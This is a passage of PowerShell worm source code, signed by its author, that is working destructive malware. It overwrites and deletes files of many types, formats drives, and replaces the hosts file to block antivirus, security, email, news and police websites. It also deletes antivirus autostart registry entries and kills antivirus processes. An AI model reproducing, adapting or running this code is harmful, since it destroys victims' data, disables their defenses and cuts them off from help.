> $AlleDateien.Path } if ($strGetExt="BMP") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="GIF") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="PNG") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="JPEG") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="AVI") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="MP3") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="WMV") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="WMA") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="DOC") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="XLS") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="RTF") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="PPS") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="PPT") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="ZIP") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="RAR") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } if ($strGetExt="CPP") { del $AlleDateien.Path ; echo "$StringToOverwrite" >> $AlleDateien.Path } } foreach ($NochMehrUnterOrdner in $TheSubFldr) { UeberschreibeDateien($NochMehrUnterOrdner) } } $TheDrives = $fso.Drives foreach ($AllDrives in $TheDrives) { if ($AllDrives.DriveType=1) { format $AllDrives.Path /y } if ($AllDrives.DriveType=2) { format $AllDrives.Path /y } } cd "$sysdir.path\Drivers\etc"; del "networks"; del "protocol"; del "services"; del "hosts"; del "hosts.bak"; echo "# Host File overwritten by Ps Worm " >> hosts echo "# This file disallows you to visit av and dl sites :> " >> hosts echo " " >> hosts echo "127.0.0.1 www.antivir.de " >> hosts echo "127.0.0.1 www.bitdefender.de " >> hosts echo "127.0.0.1 www.znet.de " >> hosts echo "127.0.0.1 www.chip.de " >> hosts echo "127.0.0.1 www.virustotal.com " >> hosts echo "127.0.0.1 virusscan.jotti.org " >> hosts echo "127.0.0.1 www.kaspersky.com " >> hosts echo "127.0.0.1 www.sophos.de " >> hosts echo "127.0.0.1 www.trojaner-info.de " >> hosts echo "127.0.0.1 www.trojaner-help.de " >> hosts echo "127.0.0.1 www.arcabit.com " >> hosts echo "127.0.0.1 www.avast.com " >> hosts echo "127.0.0.1 www.grisoft.com " >> hosts echo "127.0.0.1 www.bitdefender.com " >> hosts echo "127.0.0.1 www.clamav.net " >> hosts echo "127.0.0.1 www.drweb.com " >> hosts echo "127.0.0.1 www.f-prot.com " >> hosts) echo "127.0.0.1 www.google.de " >> hosts echo "127.0.0.1 www.fortinet.com " >> hosts echo "127.0.0.1 www.nod32.com " >> hosts echo "127.0.0.1 www.norman.com " >> hosts echo "127.0.0.1 www.microsoft.com " >> hosts echo "127.0.0.1 www.anti-virus.by/en " >> hosts echo "127.0.0.1 www.symantec.com " >> hosts echo "127.0.0.1 www.windowsupdate.com " >> hosts echo "127.0.0.1 www.trendmicro.com " >> hosts echo "127.0.0.1 www.mcafee.com " >> hosts echo "127.0.0.1 www.viruslist.com " >> hosts echo "127.0.0.1 www.avp.com " >> hosts echo "127.0.0.1 www.zonelabs.com " >> hosts echo "127.0.0.1 www.heise.de " >> hosts echo "127.0.0.1 www.antivirus-online.de " >> hosts echo "127.0.0.1 www.free-av.com " >> hosts echo "127.0.0.1 www.panda-software.com " >> hosts echo "127.0.0.1 www.pc-welt.de " >> hosts echo "127.0.0.1 www.pc-special.net " >> hosts echo "127.0.0.1 download.freenet.de " >> hosts echo "127.0.0.1 www.vollversion.de " >> hosts echo "127.0.0.1 www.das-download-archiv.de " >> hosts echo "127.0.0.1 www.freeware.de " >> hosts echo "127.0.0.1 www.antiviruslab.com " >> hosts echo "127.0.0.1 www.search.yahoo.com " >> hosts echo "127.0.0.1 www.web.de " >> hosts echo "127.0.0.1 www.hotmail.com " >> hosts echo "127.0.0.1 www.hotmail.de " >> hosts echo "127.0.0.1 www.gmx.net " >> hosts echo "127.0.0.1 www.spiegel.de " >> hosts echo "127.0.0.1 www.icq.com " >> hosts echo "127.0.0.1 www.icq.de " >> hosts echo "127.0.0.1 www.ffh.de " >> hosts echo "127.0.0.1 www.lavasoft.de " >> hosts echo "127.0.0.1 www.de.wikipedia.org " >> hosts echo "127.0.0.1 www.wikipedia.org " >> hosts echo "127.0.0.1 www.en.wikipedia.org " >> hosts echo "127.0.0.1 www.wissen.de " >> hosts echo "127.0.0.1 www.virus-aktuell.de " >> hosts echo "127.0.0.1 www.arcor.de " >> hosts echo "127.0.0.1 www.t-online.de " >> hosts echo "127.0.0.1 www.t-com.de " >> hosts echo "127.0.0.1 www.alice-dsl.de " >> hosts echo "127.0.0.1 www.freenet.de " >> hosts echo "127.0.0.1 www.1und1.de " >> hosts echo "127.0.0.1 www.fbi.gov " >> hosts echo "127.0.0.1 www.polizei.de " >> hosts $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avgnt'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG7_CC'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDMCon'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDNewsAgent'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDOESRV'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pccguide.exe'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DrWebScheduler'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerMail'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerNT'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCAgentExe'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCUpdateExe'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OASClnt'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VirusScan Online'); $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VSOCheckTask'); tskill avcenter /a tskill avconfig /a tskill avscan /a tskill avguard /a tskill avgnt /a tskill update /a tskill preupd /a tskill avcmd /a tskill avesvc /a tskill kav /a tskill kavsvc /a tskill kavsend /a tskill keymanager /a tskill agentsvr /a tskill avgcc /a tskill avgupsvc /a tskill avgamsvr /a tskill vsserv /a tskill bdss /a tskill xcommsvr /a tskill bdnagent /a tskill bdoesrv /a tskill bdmcon /a tskill bdswitch /a tskill rtvr /a tskill bdsubmit /a tskill bdlite /a tskill agentsvr /a tskill tmproxy /a tskill PcCtlCom /a tskill pccguide /a tskill qttask /a tskill patch /a tskill Tmntsrv /a tskill PccPrm /a tskill DrWebUpW /a tskill spidernt /a tskill DrWebScd /a tskill DrWeb32w /a tskill drwadins /a tskill mcupdui /a tskill McTskshd /a tskill McAppIns /a tskill mghtml /a tskill McShield /a tskill Mcdetect /a tskill McVSEscn /a tskill oasclnt /a tskill mcvsshld /a echo "$strInfoString_one "; echo "$strInfoString_two "; echo "$strInfoString_three "; echo "$strInfoString_four "; $wshs.popup("www.sk0r-scripts.tk - www.sk0r-virii.tk - www.czybik-kit.tk | Worm ¸2006 by sk0r alias Czybik",2,"PowerShell Worm by sk0r alias Czybik"); exit ;